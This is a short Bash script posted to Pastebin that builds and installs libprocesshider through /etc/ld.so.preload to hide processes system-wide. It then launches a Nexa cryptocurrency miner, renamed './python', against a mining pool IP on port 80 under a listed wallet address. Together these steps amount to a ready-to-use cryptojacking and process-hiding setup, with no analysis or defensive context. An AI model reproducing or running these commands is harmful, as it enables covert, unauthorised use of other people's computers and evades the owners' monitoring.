Advertisement
ppek

NEXA

Feb 23rd, 2023 (edited)
213
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.32 KB | None | 0 0
  1. make
  2. gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
  3. mv libprocesshider.so /usr/local/lib/
  4. echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
  5.  
  6. USER=d
  7. WALLET=nexa:nqtsq5g523anqu9s3u0t22t8k465jztrh0865hgnutgh8jx2
  8. ./python -a NEXA --pool stratum+ssl://47.254.18.74:80 --tls on -u $WALLET.$USER
  9.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement